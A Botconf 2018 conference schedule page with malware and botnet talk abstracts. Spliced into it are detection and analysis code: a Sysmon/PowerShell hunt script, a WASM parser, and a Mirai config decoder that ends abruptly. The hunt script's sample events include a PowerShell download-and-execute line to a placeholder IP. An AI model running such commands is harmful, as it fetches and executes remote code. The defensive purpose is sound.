Botconf 2018 has ended


Tuesday, December 4

10:00 CET

11:00 CET

12:30 CET

14:00 CET

14:00 CET

WS3 - Detect, Investigate and Respond using MISP, TheHive & Cortex

Raphaël VINOT

CERT Operator & MISP core developer, CIRCL
I'm one of the core developers of MISP Threat Sharing, working especially on all the APIs and interactions with 3rd-party tools.

Tuesday December 4, 2018 14:00 - 18:00 CET
GEI Insa Toulouse - Room C 135 Avenue de Rangueil, Toulouse, France
Wednesday, December 5

08:30 CET

09:45 CET

Éric FREYSSINET


Chairman / Head of the national focal point on cyberthreats, Botconf / Gendarmerie nationale
Chairman of the organising committee. French law enforcement cybercrime specialist. PhD in computer science.

Wednesday December 5, 2018 09:45 - 10:20 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

10:20 CET

Swimming in the Cryptonote Pools
In the world of cryptocurrency-related malware, mining currencies based on CryptoNote technology like Monero (XMR) is a growing threat for organizations. We can observe that interest in such cryptocurrencies has increased dramatically among malicious actors in recent months because of the specificities of this technology.

In this talk we will explain why such cryptocurrencies are appealing to malicious actors, and how to leverage publicly available sources for hunting such activities.

Wednesday December 5, 2018 10:20 - 11:00 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

11:00 CET

APT Attack against the Middle East: The Big Bang
Over the past few weeks, we discovered the comeback of an APT attack against the Middle East, and specifically against the Palestinian Authority. 

The APT group behind this attack launched a campaign over a year ago, and very little of this operation was seen in the wild since. The renewed Big Bang campaign incorporates improved capabilities, wider functionalities, and a more offensive infrastructure. It also seems to have very specific targets in mind. 

Shared interests and malware features with campaigns belonging to the Gaza Cybergang that emerged in both 2017 and 2018 show that the infamous threat group is most likely behind this attack. 

Although the APT has gone through significant upgrades over the last year, the conductors maintained evident and peculiar fingerprints. Both the delivery methods and the malicious artifacts had unique traces which helped us link the current wave to past attacks. 

Among the techniques attributed to the APT group, one can find fake news websites containing up-to-date articles, well-formulated e-mails with malicious attachments or embedded links, and mobile applications posing as legitimate services. All of these methods are meant to filter in targeted victims that meet predefined characteristics and lead to a custom-made reconnaissance malware.

During our investigation, we were able to spot only three instances of the renewed operation, but distinctive characteristics in the command and control websites revealed a wider infrastructure that may serve unknown samples. While our analysis covered the capabilities of the malware, we are certain that this is a part of an ongoing multi-staged attack, the full infection chain of which has not been completed yet. 

The campaign earned its name due to the authors’ affection for the successful TV series “The Big Bang Theory” as reflected in their function naming standard. The malware code is decorated with the character names of the popular series, but also actors of the Turkish series “Resurrection: Ertugrul”. 

In our presentation we will cover the operation of this group, focusing on the recent improvements and tactics, as well as the techniques and procedures (TTPs) that identified this group both in previous attacks and in the current one.



Malware Analyst, Check Point

Wednesday December 5, 2018 11:00 - 11:30 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

11:30 CET

Code Cartographer’s Diary
At last year's Botconf, we launched Malpedia [1], our community-driven approach to create a free and independent resource for rapid identification and actionable context when investigating malware. While only touching the surface of analysis possibilities last time (mostly surveying PE header characteristics), we want to take a deep dive in this talk, showing the results of more than two years of ongoing in-depth analysis efforts. This time, the focus will be set on the unpacked representatives of more than 700 families of Windows malware.

In the first part of this presentation, we will investigate the usage patterns of the Windows API as exposed by malware. For this, we extend ApiScout [2] with a method to extract API usage fingerprints. We will demonstrate how this information can be used to reliably identify and characterize malware families and that this information seems to capture habits of their respective authors to some degree. 

In the second part, we will introduce SMDA [3], a minimalist recursive disassembler library that is optimized for accurate Control Flow Graph (CFG) recovery from memory dumps. SMDA’s output allows us to create a function index, which can be used to identify similar code. On the one hand, we can use this similarity information to recognize and measure how commonly 3rd party libraries are used in malware. On the other hand, we can also isolate the unique, characteristic code for families in order to derive detection signatures for them. 

[1] https://malpedia.caad.fkie.fraunhofer.de 
[2] https://github.com/danielplohmann/apiscout 
[3] https://github.com/danielplohmann/smda  


Daniel Plohmann

Fraunhofer FKIE
Malware analyst at Fraunhofer FKIE

Wednesday December 5, 2018 11:30 - 12:30 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

12:30 CET

Cutting the Wrong Wire: how a Clumsy Attacker Revealed a Global Cryptojacking Campaign
We have seen a massive spike in malicious crypto mining campaigns killing themselves for the chance to have their victim’s CPU. The shorter and shorter time window between vulnerability disclosure and cryptojacking opportunistic attacks taking advantage of them may help us to understand how profitable they are to the point of getting priority over ransomware attacks. This article consists of a walk-through on a remarkable incident caused by an eager and clumsy attacker which ended up revealing multiple cryptojacking campaigns targeting large organizations across the world in early 2018.


Wednesday December 5, 2018 12:30 - 12:50 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

12:50 CET

14:00 CET

Chess with Pyotr


Dr. Brett Stone-Gross has more than 10 years of experience in computer security. He specializes in malware analysis, reverse engineering, and attack attribution. He has collaborated with many leading security experts to disrupt large-scale cybercriminal operations, including botnets...

Wednesday December 5, 2018 14:00 - 15:00 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

15:00 CET

In-depth Formbook Malware Analysis
Form-grabber malware is nowadays quite common. It provides simple yet effective methods for stealing infected users' credentials. It is named thereby since it targets HTML form submissions made by web browsers. Sometimes it also provides classical password-stealer capabilities such as key-logging, or modules designed to take screenshots. It can also embed code for harvesting users' application passwords stored on the file system.

Formbook is a 'ready-to-use' form-grabber malware, sold illegally on hacking forums. Thus, it can be used by cyber-criminals who don't necessarily have skills in malware development, although it can still be used by more advanced actors. It comes with a PHP web application used to implement the C&C server. It also offers a panel, used to graphically manage infected computers and visualize stolen data.

In order to evade antivirus detection, to detect automated malware analysis environments or to complicate its reverse engineering, Formbook implements many tricks. It also uses interesting code injection techniques, based on APC injection and thread hijacking, to perform actions like process creation from within the context of legitimate Windows processes such as explorer. Its ability to migrate from a 32-bit process, running in WoW64 compatibility mode, to a native 64-bit process also makes it worth looking at.


Wednesday December 5, 2018 15:00 - 15:40 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

15:40 CET

How Much Should You Pay for your own Botnet ?
Cloud computing provides scalable and on-demand infrastructure, which seems to be the perfect way to host a botnet. This paper focuses on cloud-based botnets to perform legal DDoS resilience tests. We model the cost of such botnets and provide both technical and economical insights into their usage for controlled DDoS attacks. While these purpose-built botnets appear to be more expensive than online DDoS booter services, they remain affordable in the context of legal audits.

Antoine REBSTOCK


Cyberdefense Engineer Apprentice, 6cure
Cyber security engineering student at Ecole Nationale Supérieure d'Ingénieurs de Bretagne Sud (ENSIBS), in apprenticeship at 6cure (a company specialized in defense against DDoS attacks).

Wednesday December 5, 2018 15:40 - 16:10 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

16:10 CET

16:40 CET

Collecting Malicious Particles from Neutrino Botnets
Neutrino Bot (also known and detected as Win/Kasidet) is a rapidly changing threat. It first became known around December 2013. It has been actively developed ever since, resulting in version 5.4 at the very beginning of 2018. From the early times, when the bot's commands were focused on various DDoS attacks, it evolved into something quite different. Its current state allows it to remotely execute commands and files, scan the infected system, and both modify and monitor network traffic, while keeping some of the old tricks as well.
In the talk, we would like to look at different versions of the bot and their specifics and describe the changes that are being made. We will also explain its current functionality and its transition into a fully functional banking trojan.
The malware is affordable and relatively cheap, which leads to many independent actors operating their botnets in very different ways. That said, it is much more interesting to learn what each group leverages the bot for rather than tracking it as a whole.
Identifying similar configurations is not always easy, but there are several ways to do so. We want to demonstrate the methods of detecting which samples belong together in order to identify different botnets. We will show the botnets that have been discovered during the last year, what is typical for them, how they use the bot and what they have delivered through it. We will also lighten the mood with several examples of situations where operators failed to execute their malicious activities properly by using a wrong configuration or harmless webinjects.
No centralized distribution method is offered, which means every botnet operator has to distribute the bot on their own. The discovered methods include malvertising, trojanized installers or the Ammyy supply chain attack.


Jakub Souček

Malware Analyst, ESET
Jakub Souček works at ESET as malware analyst since 2015. He specializes in deep analysis of malware and botnet activity tracking. In his free time, he likes to play games, watch movies or listen to some good old music.
Jakub TOMANEK


Malware analyst, ESET
Jakub Tomanek is a malware analyst at ESET. He has no conference experience so far. His work consists of analyzing recent malicious samples and monitoring their activity. In his free time, he enjoys playing the violin and riding a bike.

Wednesday December 5, 2018 16:40 - 17:20 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

17:20 CET

Trickbot The Trick is On You!
The bot malware landscape is always changing, with both new and old families being updated with new techniques to perform cybercrime. Due to their sheer number, manually analysing and tracking them is a tedious affair, which entails a delayed response to the threat. Because of this, automated systems have become an integral part of malware research to learn more about these commonly on-and-off malware operations. Data obtained from these systems can be indispensable for planning and implementing counter-moves against the threat. In this way, we can lessen the gap between threat discovery and mitigation.

With the same motivation, we have conducted research on the Trickbot family, which has become one of the most popular botnet families since its first discovery in 2016. It has evolved with new modules being added to its arsenal for spreading and stealing more information from its victims. Up to this day we are seeing new campaigns and modules being distributed in the wild.
What got us really interested in this malware is its refined network behaviour and, more importantly, the wide variety of modules that it distributes to its victims. Its rotating C2 servers and by-command delivery of its modules make manual analysis and monitoring extremely tedious. We thought this was a good opportunity to create a tracker system to monitor the malware.
Trickbot's infrastructure relies on its modular infection distributed via its own network protocol under TLS. This eventually became our entry point for gathering data from its own servers.

In this presentation, we will discuss Trickbot's behaviour. More importantly, we will also focus on the procedures we took to design and build the monitoring system, including the challenges we encountered along the way. This will rely heavily on reverse engineering its network communication and how we were able to use its own protocol to obtain specific artefacts from its servers.
As a result of the data we gathered, we will share statistics and the information generated by the tracker, and how they can be used to help mitigate the threat automatically.

Wednesday December 5, 2018 17:20 - 17:50 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

17:50 CET

Automation, structured knowledge in Tactical Threat Intelligence
With connected societies facing ever-evolving risks, traditional cyber security solutions have been charged by the popular jury with incompetence. Yet they are working for what they have been designed for; the rise of targeted attacks as well as the maturation of advanced cybercrime force defenders to find new ways of fighting the ghosts in the machines. Cyber Threat Intelligence has emerged for about a decade now, bringing a new mind-set, tools and methods to the overall InfoSec community. After recalling what composes this activity, this conceptual presentation will focus on Tactical Threat Intelligence. Diagnosing that adversaries' behaviour analysis has mainly been hijacked to provide technical indicators and strategic feedback, we will review today's methods and tools used for cyber threat profiling and express the limitations or problems they brought to Intelligence Tradecraft specialists. Moved by the impression that today's Tactical Threat Intelligence is rarely, as they say, derived into action, we will finally explore new leads that could bring the discipline more operational concretisation and will help tactical analysts on the difficult path to automating tasks in a very psychologically influenced domain.

Ronan MOUCHOUX


Security Researcher, GReAT, Kaspersky Lab
Ten years working in various positions in the information security field, from SOC to CERT, from solution design to Cyber Threat Intelligence. As a Security Researcher at GReAT Kaspersky Lab, I spend most of my time researching and developing Tactical Threat Intelligence capabilities...

Wednesday December 5, 2018 17:50 - 18:30 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

18:45 CET

Airbus


With 700 experts dedicated to cyber security, Airbus CyberSecurity offers its expertise and trusted European solutions to its customers: defense and security organisations, governments, and CNI operators. Through its Cyber Defence Centres established in France, Germany and the United Kingdom, Airbus proposes a services and products offer dynamically comb...

Thursday, December 6

08:30 CET

09:00 CET

Internals of a Spam Distribution Botnet
Cybercriminals use different methods to distribute malware, like malicious advertisements, Exploit Kits, loaders or spam campaigns. Unless an attack is really targeted, the bad guys will try to infect as many computers as possible, and they need some automation for that. It is well known that they use botnets to distribute malware and create spam campaigns. Popular malware families like Necurs, Cutwail, Onliner Spambot or Emotet are examples of this kind of botnet, which are not usually analyzed deeply because we tend to focus on the final malware families which are spread, like bankers, stealers or RATs. This talk will focus on one of these malware families used to send spam, Onliner Spambot, explaining internal details about its different modules, its control panel, how it checks and misuses stolen credentials, and the threat actors who are operating and selling it. Malware distribution is an interesting part of the cybercrime ecosystem and it is important to pay attention to those distribution botnets too.


Jose Miguel ESPARZA

Head of Threat Intelligence, Blueliv

Thursday December 6, 2018 09:00 - 09:50 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

09:50 CET

Botception: Botnet distributes script with bot capabilities
Monitoring botnets is a crucial component of cybersecurity, but it's not every day we see a botnet spreading scripts with bot capabilities. At the end of April 2018, while monitoring one of the branches of the Necurs botnet, we observed new scripts being distributed by the botnet.

In our presentation we will dive into the results of our analysis of scripts with bot capabilities, spread by a botnet. The analyzed scripts were spread by the Necurs botnet through spam emails, and while the initial infection chain was rather short, the multiple stages thereafter included capabilities to make it a fully fledged botnet.

The distribution of these scripts is an interesting step away from the standard behavior of the Necurs botnet, and we will therefore share information about the Necurs branch we are monitoring, the changes it underwent in a year, and a detailed analysis of the script bot itself. As the code involved in the infection chain was not heavily obfuscated, the analysis will be interlaced with code examples.

Our analysis provides detailed information about the function and behavior of the scripts, the origin of the information and a comparison of the scripts’ versions over time. After we explore the scripts’ whereabouts, we will again dive more deeply into the Ammyy-like malware infection chain.



Malware Analysis Team Lead, Avast Software s.r.o

Adolf Středa

Malware Researcher, Avast Software s.r.o.

Thursday December 6, 2018 09:50 - 10:20 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

10:20 CET

Stagecraft of Malicious Office Documents – A Look at Recent Campaigns
Malicious Office documents have become a favorite malware delivery tool for malware authors. We have observed an increase in the use of malicious documents over the past 4 years: 30% of the malware blocked by Zscaler Cloud Sandbox since 2017 are malicious Office documents. Malicious Office documents are used for the delivery of crimeware payloads and are also often involved in Advanced Persistent Threat (APT) attacks. Over time, these malicious Office documents have used various obfuscation, encryption and evasion techniques to prevent detection. In this paper, we will provide a detailed analysis of the different obfuscation, encryption, exploit and evasion techniques used in these malicious documents. We have analyzed over one thousand malicious documents from fifty different campaigns for this study. This research paper also lists the different malware samples delivered by these malicious documents and the use of PowerShell as well as other scripting languages.


Deepen DESAI

Deepen Desai is responsible for running the security research operations at Zscaler ThreatLabZ. Deepen has been actively involved in the field of Threat Research and Analysis for the past 15 years. He is passionate about building new detection modules to counter the evolving threat landscape...
Tarun DEWAN


Zscaler Softech India Pvt Ltd
I have been working in the malware analysis industry for the last 6.8 years. Currently I am at Zscaler as a Senior Security Researcher, and previously I worked with Norman and McAfee. In my free time I love to play cricket and listen to songs.

Dr. Nirmal SINGH

Sr. Manager, Security Research, Zscaler
Nirmal Singh is Sr. Manager for the security research team at Zscaler ThreatLabZ, located in Chandigarh, India. Nirmal has a PhD in computer science and has been working in the Threat Research and Analysis field for the past 10 years. He oversees malware research, detection and innovation at Zscaler. Prior...

Thursday December 6, 2018 10:20 - 10:50 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

10:50 CET

11:10 CET

Hunting and Detecting APTs using Sysmon and PowerShell Logging
Many security professionals and Blue Team members appreciate a good, detailed written APT report by any renowned security company. This is especially true if it documents and explains some new and stealthy technique that was used and is not yet well known by defenders.

One such technique is "WMI event subscription" for persistence, which has been used by APT29.
Another one is the "Logon Script" technique (the "UserInitMprLogonScript" registry key) used by APT28.
A third technique that is discussed very often is (ab-)using PowerShell and "living off the land" (LOL).
To top even this one, attackers are using "unmanaged PowerShell" (e.g. using PowerPick) to evade command-line based detection. But thanks to the PowerShell logging features available since version 5, even this can be detected.

I will discuss and show how to detect all of these techniques by using Sysmon data and PowerShell logging (with Splunk as a SIEM).
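The three techniques above map onto a small number of event types, which is what makes them huntable: Sysmon records WMI filters, consumers and bindings as events 19, 20 and 21, a registry value set as event 13, and image loads as event 7 (so System.Management.Automation loaded by anything other than a PowerShell host is the unmanaged case), while PowerShell script block logging writes event 4104 whatever process hosted the runspace. The following is an added example, not the speaker's Splunk content: toy detections over constructed events in a dict-per-event shape that is an assumption of the example, with the indicator regex for script blocks also an assumption to be tuned per estate.

```python
"""Added example (not the speaker's code): three toy detections for the
techniques named above, run over constructed Sysmon and PowerShell events.

Assumed input shape: one dict per event carrying the field names from the
Windows event XML (EventID, Image, ImageLoaded, TargetObject, Details,
ScriptBlockText, ...), roughly what a SIEM shows after parsing the channel."""
import re

# Constructed sample events, not real telemetry.
EVENTS = [
    # Sysmon 20 and 21: a WMI event consumer and the filter-to-consumer
    # binding (WmiEvent), the subscription persistence used by APT29.
    {"EventID": 20, "Name": "Updater",
     "Destination": "powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgA"},
    {"EventID": 21, "Consumer": 'CommandLineEventConsumer.Name="Updater"',
     "Filter": '__EventFilter.Name="UpdaterFilter"'},
    # Sysmon 13 (RegistryEvent, value set): the UserInitMprLogonScript
    # logon-script persistence used by APT28.
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKU\\S-1-5-21-1-2-3-1001\\Environment\\UserInitMprLogonScript",
     "Details": "C:\\Users\\Public\\s.bat"},
    # Sysmon 7 (ImageLoaded): System.Management.Automation loaded into a
    # process that is not a PowerShell host -> unmanaged PowerShell.
    {"EventID": 7, "Image": "C:\\Windows\\Temp\\svc.exe",
     "ImageLoaded": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll"},
    # The same DLL loaded by the real host is expected.
    {"EventID": 7, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ImageLoaded": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll"},
    # PowerShell 4104 (script block logging) fires whatever the host was.
    {"EventID": 4104, "Path": "",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"},
    {"EventID": 4104, "Path": "C:\\scripts\\inventory.ps1",
     "ScriptBlockText": "Get-WmiObject Win32_ComputerSystem | Select-Object Name"},
]

POWERSHELL_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
# Assumed indicator list for the script-block check; tune to your estate.
SUSPICIOUS_PS = re.compile(
    r"(?i)(\bIEX\b|Invoke-Expression|DownloadString|-Enc(odedCommand)?\b|FromBase64String)")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(event):
    """Return (technique, detail) hits for one event; empty list if clean."""
    eid, hits = event.get("EventID"), []
    if eid in (19, 20, 21):
        what = event.get("Name") or event.get("Consumer") or event.get("Filter", "")
        hits.append(("wmi_event_subscription", f"Sysmon {eid}: {what}"))
    if eid == 13 and event.get("TargetObject", "").lower().endswith(
            "\\environment\\userinitmprlogonscript"):
        hits.append(("logon_script_persistence", event.get("Details", "")))
    if (eid == 7
            and basename(event.get("ImageLoaded", "")).startswith("system.management.automation")
            and basename(event.get("Image", "")) not in POWERSHELL_HOSTS):
        hits.append(("unmanaged_powershell", event["Image"]))
    if eid == 4104 and SUSPICIOUS_PS.search(event.get("ScriptBlockText", "")):
        hits.append(("suspicious_script_block", event["ScriptBlockText"][:60]))
    return hits

def hunt(events):
    """Run detect() over a stream; returns (index, technique, detail) tuples."""
    return [(i, t, d) for i, e in enumerate(events) for t, d in detect(e)]

if __name__ == "__main__":
    for i, technique, detail in hunt(EVENTS):
        print(f"event {i}: {technique} -> {detail}")
```

The image-load rule is the one worth keeping even if the script-block regex is retired: a loader of the PowerShell engine that is not itself a PowerShell host is a short allow-list away from a high-fidelity alert, and 4104 still captures what that host ran.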

Tom UELTSCHI


APT Hunter, Swiss Post

Thursday December 6, 2018 11:10 - 11:50 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

11:50 CET

Hunting for Silence

Rustam Mirkasymov

Head of dynamic analysis department, Group-IB

Thursday December 6, 2018 11:50 - 12:40 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

12:45 CET

14:00 CET

14:40 CET

Everything Panda Banker
The Panda Banker malware was first spotted in the wild in early 2016. It has since seen consistent development, gained a significant threat actor user base, and has become one of the most advanced and persistent banking malwares in the current threat landscape. This presentation compiles together the author's research and tracking of Panda Banker complemented with the prior work of other malware researchers studying the threat. Its aim is to provide a detailed survey of everything Panda Banker: what it is, where did it come from, what it does, how it works, who's using it, how effective they are, who is being targeted, and where is it going. The hope is for researchers and defenders to walk away with a better understanding of Panda Banker and maybe some ideas on how to better detect and mitigate it.


Thursday December 6, 2018 14:40 - 15:10 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

15:10 CET

16:00 CET

16:30 CET

The Dark Side of the ForSSHe
In February 2014, ESET researchers from Montreal published a report on a group that had compromised more than 40,000 Linux servers worldwide since 2011. ESET named this campaign Windigo. At the centre of this operation was Ebury, an OpenSSH backdoor which allowed the attackers to remotely take control of compromised servers as well as to steal login credentials (passwords, keys), which were then used to connect to other servers. This simple yet effective method allowed them to extend their network of compromised servers.

Thursday December 6, 2018 16:30 - 17:20 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

17:20 CET

Lightning talks
Éric FREYSSINET


Chairman / Head of the national focal point on cyberthreats, Botconf / Gendarmerie nationale
Chairman of the organising committee. French law enforcement cybercrime specialist. PhD in computer science.

Thursday December 6, 2018 17:20 - 18:15 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

19:00 CET

Éric FREYSSINET


Chairman / Head of the national focal point on cyberthreats, Botconf / Gendarmerie nationale
Chairman of the organising committee. French law enforcement cybercrime specialist. PhD in computer science.

Facebook


Founded in 2004, Facebook’s mission is to give people the power to build community and bring the world closer together. People use Facebook to stay connected with friends and family, to discover what’s going on in the world, and to share and express what matters to them...
Google


Google’s mission is to organize the world’s information and make it universally accessible and useful. Through products and platforms like Search, Maps, Gmail, Android, Google Play, Chrome and YouTube, Google plays a meaningful role in the daily lives of billions of people and has become...
Talos


Talos is Cisco’s industry-leading threat intelligence team that protects your organization’s people, data and infrastructure from active adversaries. The Talos team collects information about existing and developing threats, and provides comprehensive protection against more attac...

Thursday December 6, 2018 19:00 - 23:30 CET
Friday, December 7

08:45 CET

09:20 CET

WASM Security Analysis Reverse Engineering
WebAssembly (WASM) is a new technology designed for browsers. It aims to define a portable, size- and load-time-efficient binary format to serve as a compilation target which can be compiled to execute at native speed by taking advantage of common hardware capabilities available on a wide range of platforms, including mobile and IoT.
Our presentation will cover a brief introduction to this technology and its analysis with or without access to the source code. It will also cover security issues and how it can be used by a botnet.
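Analysis without source code starts from the binary format itself: a module is a magic number, a version, and a sequence of sections, each tagged with a one-byte id and a LEB128-encoded size, and the import and export sections are where the module's contact points with the host (and therefore with any C&C or mining code it calls into) are named. The following is an added example, not from the speakers: a minimal section walker in Python that lists sections, imports and exports. The module bytes are hand-assembled for the example (one empty function exported as "main", importing env.abort); the section and kind names follow the public WebAssembly binary specification.

```python
"""Added example, not from the speakers: a minimal walker for the WebAssembly
binary format that lists a module's sections, imports and exports with no
source code available.  The module bytes are hand-assembled for this example
(a single function exported as "main" that imports env.abort)."""
import struct

WASM_MAGIC = b"\x00asm"
SECTION_NAMES = {0: "custom", 1: "type", 2: "import", 3: "function", 4: "table",
                 5: "memory", 6: "global", 7: "export", 8: "start", 9: "element",
                 10: "code", 11: "data", 12: "datacount"}
KINDS = {0: "func", 1: "table", 2: "memory", 3: "global"}

def read_uleb128(buf, pos):
    """Decode an unsigned LEB128 integer at pos; return (value, next_pos)."""
    result = shift = 0
    while True:
        b = buf[pos]
        pos += 1
        result |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return result, pos

def read_name(buf, pos):
    n, pos = read_uleb128(buf, pos)
    return buf[pos:pos + n].decode("utf-8"), pos + n

def skip_limits(buf, pos):
    flag = buf[pos]
    _, pos = read_uleb128(buf, pos + 1)
    if flag & 1:                      # max present
        _, pos = read_uleb128(buf, pos)
    return pos

def parse_imports(body):
    count, pos = read_uleb128(body, 0)
    imports = []
    for _ in range(count):
        module, pos = read_name(body, pos)
        name, pos = read_name(body, pos)
        kind = body[pos]
        pos += 1
        if kind == 0:                 # func: type index
            _, pos = read_uleb128(body, pos)
        elif kind == 1:               # table: reftype byte + limits
            pos = skip_limits(body, pos + 1)
        elif kind == 2:               # memory: limits
            pos = skip_limits(body, pos)
        elif kind == 3:               # global: valtype + mutability
            pos += 2
        imports.append((module, name, KINDS[kind]))
    return imports

def parse_exports(body):
    count, pos = read_uleb128(body, 0)
    exports = []
    for _ in range(count):
        name, pos = read_name(body, pos)
        kind = body[pos]
        idx, pos = read_uleb128(body, pos + 1)
        exports.append((name, KINDS[kind], idx))
    return exports

def parse_module(data):
    """Walk the section list; decode imports and exports, record the rest."""
    if data[:4] != WASM_MAGIC:
        raise ValueError("not a WebAssembly module")
    info = {"version": struct.unpack("<I", data[4:8])[0],
            "sections": [], "imports": [], "exports": []}
    pos = 8
    while pos < len(data):
        sid = data[pos]
        size, pos = read_uleb128(data, pos + 1)
        body = data[pos:pos + size]
        pos += size
        info["sections"].append((SECTION_NAMES.get(sid, "unknown"), size))
        if sid == 2:
            info["imports"] = parse_imports(body)
        elif sid == 7:
            info["exports"] = parse_exports(body)
    return info

# Hand-assembled module (constructed for the example).
SAMPLE_WASM = bytes.fromhex(
    "0061736d01000000"      # magic, version 1
    "010401600000"          # type section: one functype () -> ()
    "020d0103656e76"        # import section: module "env"
    "0561626f72740000"      #   name "abort", kind func, type 0
    "03020100"              # function section: one func of type 0
    "070801046d61696e0001"  # export section: "main" = func 1
    "0a040102000b"          # code section: one empty body (end opcode)
)

if __name__ == "__main__":
    for key, value in parse_module(SAMPLE_WASM).items():
        print(key, value)
```

On a real module the import list is the first triage question: a miner or bot component that imports WebSocket or fetch wrappers from its JavaScript glue shows up here before any opcode is decoded, and the code section size is a quick proxy for how much is left to disassemble.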



China, nsfocus
Security researcher focused on DDoS and threat intelligence analysis

09:50 CET

Red Teamer 2.0: Automating the C&C Set up Process
This talk follows the amazing documentation provided by Steve Borosh (@424f424f) and Jeff Dimmock (@bluscreenofjeff) in their dedicated repo.
It also builds on several experiences of red team operations leveraging the tips issued by these authors.
We will describe a new open source tool, whose name will be revealed during the presentation. That tool aims at managing red teams' operations and, in particular, enables Command and Control infrastructure set-up automation.

Charles IBRAHIM


Senior consultant, Wavestone
I believe in hard work, reliability, and human relationships. From a more "computer science" point of view, I am (obviously if you've read my experience) fond of systems and networks security, and wish constantly to improve my limited skills. I pretend to be a developer, aim at being...

10:10 CET

Mirai: Beyond the Aftermath
Two years have passed since Mirai unleashed its wrath on the world by targeting high-profile victims. Many things have happened since then: the good, the author responsible has already been convicted; the bad, the source code was released to the public; and the not so bad, organizations became aware of the threat and geared up their defences for the possible next attack. The question now is, what's next after Mirai? Ever since the release of its source code, many have used, experimented with, and modified the code to their own liking and purpose. These so-called Mirai copycats all want to have a piece of the IoT pie, battling to compromise more vulnerable IoT devices to grow their own army of bots and become Mirai's possible heir. This research on the aftermath of Mirai will focus on three technical aspects: Mirai variants with their significant modifications, a genealogy of all Mirai variants identified so far, and whether other botnets have reused some of Mirai's code.
To begin with, we will talk about the added techniques implemented in the variants to infect more IoT devices, like an exhaustive factory-default credential set, the use of both known and unknown exploits, and targeting more architectures. We will also present the new ways they monetize IoT bots, such as by targeting miners or using them as proxies.
The research has so far identified 100 variants and counting. We will discuss how we automatically decrypt and dump the configuration for easy family identification and C2 extraction. Additionally, to have a better overview and understanding of the variants, we will compare all of them and see how they relate to each other.
A botnet that we observed reusing Mirai's code is Hide 'N Seek. We will take a look at its modules and compare it to Mirai to see whether the configuration encryption algorithm is still the same.
To finish the presentation, we will share interesting insights, findings and lessons learned in the research and how these can help researchers in their threat intel tasks.
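Automatic configuration dumping and the "is the encryption still the same" comparison both rest on the scheme in the public Mirai source: table.c keeps the configuration strings obfuscated and toggle_obf() XORs every byte with each of the four bytes of a 32-bit key in turn (0xdeadbeef in the release), which collapses to a single-byte XOR, so a variant that only swapped the key is one 256-step crib search away from yielding its C2. The following is an added example, not the speakers' tooling: a port of that routine, the key collapse, and a known-plaintext key recovery. The length-prefixed table layout, the entry strings, the placeholder domain and the variant key are constructed for the demo, not taken from a sample.

```python
"""Added example, not the speakers' tooling.  The public Mirai source hides
its configuration "table" by XORing every byte with the four bytes of a
32-bit key in turn (toggle_obf in table.c, key 0xdeadbeef); variants tend to
keep the scheme and only change the key.  Below: a port of that routine,
the observation that the four XORs collapse to one byte, and a crib-based
search that recovers the effective key from a dump.  The length-prefixed
table layout, the entry strings and the variant key are constructed for this
demo, not taken from a real sample."""
import struct

ORIGINAL_KEY = 0xDEADBEEF

def effective_key(key32):
    """XOR with k1, then k2, k3, k4 equals XOR with a single byte."""
    k1, k2, k3, k4 = struct.pack("<I", key32)
    return k1 ^ k2 ^ k3 ^ k4

def toggle_obf(data, key32=ORIGINAL_KEY):
    """Port of Mirai's toggle_obf(): symmetric, so it both hides and reveals."""
    k1, k2, k3, k4 = struct.pack("<I", key32)
    return bytes(b ^ k1 ^ k2 ^ k3 ^ k4 for b in data)

def xor_byte(data, k):
    return bytes(b ^ k for b in data)

def build_table(entries, key32=ORIGINAL_KEY):
    """Constructed layout: uint16 BE length + obfuscated NUL-terminated string."""
    out = b""
    for s in entries:
        blob = s.encode() + b"\x00"
        out += struct.pack(">H", len(blob)) + toggle_obf(blob, key32)
    return out

def parse_table(blob, k):
    """Walk the constructed layout, revealing each entry with single byte k."""
    pos, items = 0, []
    while pos + 2 <= len(blob):
        n = struct.unpack(">H", blob[pos:pos + 2])[0]
        pos += 2
        items.append(xor_byte(blob[pos:pos + n], k).rstrip(b"\x00").decode("latin-1"))
        pos += n
    return items

def recover_key(blob, crib=b"/bin/busybox"):
    """Brute-force the effective byte with a plaintext that Mirai-style tables
    carry; returns the byte or None if the crib never appears."""
    for k in range(256):
        if crib in xor_byte(blob, k):
            return k
    return None

# Constructed entries; the domain is a placeholder.
ENTRIES = ["cnc.example.test", "/bin/busybox MIRAI", "listening tun0", "/proc/"]

if __name__ == "__main__":
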